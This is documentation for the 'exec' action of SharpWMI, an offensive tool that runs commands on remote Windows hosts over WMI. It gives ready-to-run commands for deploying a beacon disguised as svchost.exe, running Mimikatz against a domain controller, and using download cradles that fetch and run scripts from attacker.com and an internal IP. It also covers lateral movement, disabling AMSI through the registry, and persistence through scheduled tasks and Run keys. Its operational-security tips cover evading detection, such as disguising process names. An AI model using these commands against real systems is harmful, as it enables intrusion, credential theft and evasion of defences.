Skip to main content

Overview

The exec action creates and executes processes on local and remote systems using the Win32_Process.Create WMI method. It supports command execution with optional output retrieval and AMSI evasion capabilities.
The exec action is one of the most powerful features in SharpWMI, enabling direct code execution on remote systems through native Windows management infrastructure.

Syntax

  • Basic Execution
  • With Output Retrieval
SharpWMI.exe action=exec [computername=HOST[,HOST2,...]] command="COMMAND" [username=DOMAIN\user] [password=Password]
The exec action can also be invoked using action=execute or action=create aliases.

Parameters

ParameterRequiredDescription
actionYesMust be exec, execute, or create
commandYesCommand line to execute
computernameNoTarget host(s), comma-separated. Defaults to localhost
resultNoSet to true to retrieve command output. Default: false
amsiNoSet to disable to bypass AMSI (requires result=true)
usernameNoUsername for authentication (requires password)
passwordNoPassword for authentication (requires username)

Usage Examples

Basic Process Creation

SharpWMI.exe action=exec computername=target.domain.com command="notepad.exe"

Command Output Retrieval

Capture and display command output: 
SharpWMI.exe action=exec computername=target.domain.com command="whoami" result=true

Example Output

[*] Host                           : target.domain.com
[*] Command                        : whoami
[*] User name                      : DOMAIN\user
[*] Creation of process returned   : 0
[*] Process ID                     : 5432
[+] Command result:

DOMAIN\user

Command Output Mechanism

When result=true is specified, SharpWMI uses a clever technique to retrieve command output:
1

Command Wrapping

The command is wrapped in PowerShell that captures output and XOR-encodes it
2

Environment Variable Storage

Encoded output is stored in a WMI environment variable with a random name
3

Output Retrieval

SharpWMI queries the environment variable and decodes the output
4

Cleanup

Environment variables are automatically deleted after retrieval
The output retrieval mechanism:
  1. Creates a random XOR key
  2. Wraps your command in PowerShell: $o=(COMMAND | Out-String).Trim()
  3. XOR-encodes the output
  4. Stores in environment variable via Set-WmiInstance -Class Win32_Environment
  5. Retrieves and decodes the output
  6. Cleans up the environment variable
This technique was contributed by Evi1cg (@Ridter).

AMSI Evasion

When amsi=disable is specified (requires result=true), SharpWMI:
1

Registry Modification

Sets HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable to 0
2

Command Execution

Executes your command with AMSI disabled
3

Registry Restoration

Restores original AMSI registry value
AMSI evasion requires administrative privileges and may be detected by EDR solutions. The registry modification is temporary and cleaned up after execution.
AMSI evasion code contributed by Steven Flores (0xthirteen) from SharpMove.

Operational Scenarios

Scenario 1: Initial Access and Beacon Deployment

# 1. Test connectivity with simple command
SharpWMI.exe action=exec computername=target.domain.com command="whoami" result=true

# 2. Upload beacon (using upload action)
SharpWMI.exe action=upload computername=target.domain.com source="beacon.exe" dest="C:\Windows\temp\svchost.exe" amsi=disable

# 3. Execute beacon
SharpWMI.exe action=exec computername=target.domain.com command="C:\Windows\temp\svchost.exe"

# 4. Verify execution
SharpWMI.exe action=ps computername=target.domain.com

Scenario 2: Credential Harvesting

# Execute Mimikatz with encoded command
SharpWMI.exe action=exec computername=dc.domain.com command="powershell.exe -enc <BASE64_MIMIKATZ>" result=true amsi=disable username="DOMAIN\admin" password="Password123!"

# Or download and execute from URL
SharpWMI.exe action=exec computername=dc.domain.com command="powershell -c \"IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/Invoke-Mimikatz.ps1')\"" result=true amsi=disable

Scenario 3: Lateral Movement

# Execute across multiple systems
SharpWMI.exe action=exec computername=ws01,ws02,ws03,ws04,ws05 command="powershell -c \"IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.100/payload.ps1')\"" amsi=disable

# With credential reuse
SharpWMI.exe action=exec computername=server1,server2,server3 command="rundll32.exe payload.dll,EntryPoint" username="DOMAIN\admin" password="Password123!"

Scenario 4: Domain Reconnaissance

# Enumerate domain admins
SharpWMI.exe action=exec computername=dc.domain.com command="powershell -c 'Get-ADGroupMember \"Domain Admins\" | Select Name'" result=true amsi=disable

# Find admin workstations
SharpWMI.exe action=exec computername=dc.domain.com command="powershell -c 'Get-ADComputer -Filter {OperatingSystem -like \"*workstation*\"} | Select Name'" result=true amsi=disable

# Enumerate trusts
SharpWMI.exe action=exec computername=dc.domain.com command="powershell -c 'Get-ADTrust -Filter *'" result=true amsi=disable

Scenario 5: Persistence Mechanisms

# Create scheduled task
SharpWMI.exe action=exec computername=target.domain.com command="schtasks /create /tn \"WindowsUpdate\" /tr \"C:\Windows\temp\persist.exe\" /sc onlogon /ru SYSTEM" result=true

# Registry Run key
SharpWMI.exe action=exec computername=target.domain.com command="reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Update /t REG_SZ /d C:\Windows\temp\persist.exe" result=true

# WMI event subscription (using executevbs action is better)
SharpWMI.exe action=exec computername=target.domain.com command="powershell -c \"<WMI_SUBSCRIPTION_SCRIPT>\"" result=true amsi=disable

Remote vs Local Usage

  • Local Execution
  • Remote Execution
When to use:
  • Post-exploitation on compromised system
  • Testing commands before remote execution
  • Local privilege escalation
Advantages:
  • No network traffic
  • No authentication required
  • Faster execution
SharpWMI.exe action=exec command="cmd.exe /c whoami"

Command Line Best Practices

Quote Handling

Use proper escaping for complex commands:
# Good
command="powershell -c \"Get-Process\""

# Bad (quotes not escaped)
command="powershell -c "Get-Process""

Encoded Commands

Base64 encode complex PowerShell:
# Encode locally
$command = 'Get-Process; whoami'
$bytes = [Text.Encoding]::Unicode.GetBytes($command)
$encoded = [Convert]::ToBase64String($bytes)

# Execute
SharpWMI.exe action=exec command="powershell -enc $encoded"

Detection Considerations

Win32_Process.Create is a high-fidelity indicator of remote code execution and is heavily monitored in mature environments.
  • Event ID 4688: Process creation events
  • Event ID 4648: Logon with explicit credentials
  • Sysmon Event ID 1: Process creation
  • Parent process: wmiprvse.exe (WMI Provider Host)
  • Unusual process trees (wmiprvse.exe → cmd.exe → powershell.exe)
  • Event ID 5857: WMI activity
  • Event ID 5860-5861: WMI event consumers
  • Sysmon Event ID 19-21: WMI activity
  • Registry modifications for AMSI evasion
  • Creation/deletion of environment variables
  • DCOM traffic on port 135
  • Dynamic RPC connections
  • Multiple WMI connections from single source
  • WMI traffic to sensitive systems (DCs, servers)
  • Suspicious command-line arguments
  • Base64 encoded commands
  • Web requests in command line
  • Credential dumping tools (mimikatz, etc.)
  • PowerShell download cradles

Best Practices

Operational Security

  • Use AMSI evasion when executing PowerShell
  • Avoid obvious malicious command lines
  • Use encoded commands when possible
  • Clean up created processes/files
  • Limit use of result=true (creates artifacts)

Execution Strategy

  • Test commands locally before remote execution
  • Use short-lived processes
  • Consider process names that blend in
  • Stage payloads via upload action first
  • Monitor for command failures

Error Handling

  • Check return values (0 = success)
  • Verify process started successfully
  • Handle timeout scenarios
  • Account for AV/EDR blocking

Credential Management

  • Use minimal necessary privileges
  • Rotate credentials between operations
  • Avoid reusing domain admin credentials
  • Monitor for lockouts

Return Values

The Creation of process returned value indicates success or failure:
Return ValueMeaning
0Successful completion
2Access denied
3Insufficient privilege
8Unknown failure
9Path not found
21Invalid parameter

Troubleshooting

Cause: Insufficient privileges or security restrictionsSolution:
  • Verify admin credentials
  • Check UAC remote restrictions
  • Ensure user is in local Administrators group
  • Try with domain admin account
Cause: Executable or file path doesn’t existSolution:
  • Verify path exists on target system
  • Use full paths instead of relative
  • Upload executable first with upload action
  • Check for typos in command
Cause: Process doesn’t generate stdout or requires admin contextSolution:
  • Verify command produces output when run locally
  • Check if process requires elevated privileges
  • Try without result=true first
  • Increase timeout if process is slow
Cause: Insufficient privileges or EDR blockingSolution:
  • Ensure you have admin rights
  • Verify registry modification succeeded
  • Try alternative AMSI bypass methods
  • Check for EDR blocking registry changes

executevbs

Execute VBScript via WMI event subscriptions

upload

Upload files before execution

ps

Verify process creation

terminate

Kill created processes